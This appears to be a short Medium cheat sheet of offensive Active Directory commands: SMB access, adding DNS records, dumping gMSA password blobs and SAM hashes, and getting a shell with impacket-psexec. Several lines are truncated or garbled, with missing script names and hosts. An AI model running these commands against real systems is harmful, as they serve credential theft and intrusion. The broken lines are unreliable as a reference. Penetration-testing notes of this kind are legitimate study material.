Useful Offensive Snippets


SMB Connect

smbclient -U <USER> //<HOST>/<SHARE>
smbclient -U Diddy.Doodat //

Add DNS record kerberos

python3 -u '<DOMAIN>\<USER>' -p <PASSWORD> -r -a add -t A -d <DOMAIN IP> <DNS IP>
python3 -u 'hacked\diddy.doodat' -p OMGJonathanScott -r -a add -t A -d

Dump gMSA password blobs

python3 -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
python3 -u 'diddy.doodat' -p 'OMGJonathanScott' -d

Mount SMB share to Linux Host

mount -t cifs //<HOST>/<SHARE> /tmp/mnt
mount -t cifs // /tmp/mnt

Shell from Linux with Impacket (psexec)

impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>
impacket-psexec -k -no-pass

Dump SAM hashes on Linux

impacket-secretsdump -sam SAM -system SYSTEM local


Fix Clock Skew Error

sudo ntpdate <NTP SERVER IP>
sudo ntpdate

Mount VHD

guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd
guestmount — add leaked.vhd — inspector — ro -v /tmp/vhd



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store